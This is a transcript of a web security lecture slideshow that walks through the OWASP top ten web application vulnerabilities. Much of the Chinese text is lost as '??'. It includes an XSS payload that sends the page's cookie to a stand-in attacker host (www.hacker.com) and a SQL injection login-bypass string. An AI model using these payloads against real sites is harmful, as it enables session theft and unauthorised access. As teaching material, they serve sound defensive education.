WWW?? - PowerPoint PPT Presentation

About This Presentation
Title:

WWW??

Description:

WWW WWW Web security is important for E-Commerce. Previous studies: SSL SET Web server security ... – PowerPoint PPT presentation

Number of Views:55
Avg rating:3.0/5.0
Slides: 20
Provided by: YenC6
Category:
Tags: www | hijack

less

Transcript and Presenter's Notes

Title: WWW??


1
WWW??
  • ????????
  • ??????
  • ???

2
WWW??
  • Web security is important for E-Commerce.
  • Previous studies
  • SSL
  • SET
  • Web server security
  • Application-level security
  • Web applications mistakenly trust data returned
    from a client.

3
OWASP
  • Open Web Application Security Project (OWASP)
  • http//www.owasp.org/index.php/Taiwan

4
??Web??????
(2007)
  • A1.?????? (Cross Site Scripting,??XSS)
  • A2. ????(Injection Flaw)SQL Injection?Command
    Injection
  • A3. ??????(Malicious File Execution)
  • A4. ????????(Insecure Direct Object Reference)
  • A5. ???????? (Cross-Site Request Forgery,??CSRF)
  • A6. ??????????
  • A7. ???????????
  • A8. ?????????
  • A9. ??????(Insecure Communication)
  • A10. ????URL??(Failure to Restrict URL Access)

???? OWASP????
OWASP Open Web Application Security Project
5
The Ten Most Critical Web Application Security
Vulnerabilities
  1. Unvalidated Parameters
  2. Broken Access Control
  3. Broken Account and Session Management
  4. Cross-Site Scripting (XSS)
  5. Buffer Overflows
  6. Command Injection Flaws
  7. Error Handling Problems
  8. Insecure Use of Cryptography
  9. Remote Administration Flaws
  10. Web and Application Server Misconfiguration

6
(1). Unvalidated Parameters
  • Information from web requests is not validated
    before being used by a web application.
  • Attackers can use these flaws to attack
    background components through a web application.

7
(2). Broken Access Control
  • Restrictions on what authenticated users are
    allowed to do are not properly enforced.
  • Attackers can exploit these flaws to access other
    users' accounts, view sensitive files, or use
    unauthorized functions.

http//www.citibank.com/print.asp?idu1257
8
(3). Broken Account and Session Management
  • Account credentials and session tokens are not
    properly protected.
  • Attackers that can compromise passwords, keys,
    session cookies, or other tokens can defeat
    authentication restrictions and assume other
    users' identities.

9
(4). Cross-Site Scripting (XSS)
  • The web application can be used as a mechanism to
    transport an attack to an end user's browser.
  • A successful attack can disclose the end user's
    session token, attack the local machine, or spoof
    content to fool the user.

10
XSS Example
???
ltscriptgt window.location"http//www.hacker.com/st
eal.cgi?ck"document.cookie lt/scriptgt
11
XSS Web Application Hijack Scenario
www.hacker.com
12
(5). Buffer Overflows
  • Web application components in some languages that
    do not properly validate input can be crashed
    and, in some cases, used to take control of a
    process.
  • These components can include CGI, libraries,
    drivers, and web application server components.

13
(6). Command Injection Flaws
  • Web applications pass parameters when they access
    external systems or the local operating system.
  • If an attacker can embed malicious commands in
    these parameters, the external system may execute
    those commands on behalf of the web application.

14
SQL Injection
  • SQLQuery
  • SELECT ? FROM Users WHERE (UserName' strUN
    ') AND (Password' strPW ')
  • ? User name fredchen, password 199msq
  • SELECT ? FROM Users WHERE (UserName'fredchen')
    AND (Password'199msq')
  • ? SQL Injection User name/Password ' OR 'A''A

SELECT ? FROM Users WHERE (UserName'' OR
'A''A') AND (Password'' OR 'A''A')
15
Input Validation
16
(7). Error Handling Problems
  • Error conditions that occur during normal
    operation are not handled properly.
  • If an attacker can cause errors to occur that the
    web application does not handle, they can gain
    detailed system information, deny service, cause
    security mechanisms to fail, or crash the server.

17
(8). Insecure Use of Cryptography
  • Web applications frequently use cryptographic
    functions to protect information and credentials.
  • These functions and the code to integrate them
    have proven difficult to code properly,
    frequently resulting in weak protection.
  • E.g. MD5(CreditCardNum, RandomNum)

18
(9). Remote Administration Flaws
  • Many web applications allow administrators to
    access the site using a web interface.
  • If these administrative functions are not very
    carefully protected, an attacker can gain full
    access to all aspects of a site.

19
(10). Web and Application Server Misconfiguration
  • Having a strong server configuration standard is
    critical to a secure web application.
  • These servers have many configuration options
    that affect security and are not secure out of
    the box.
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "WWW??" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!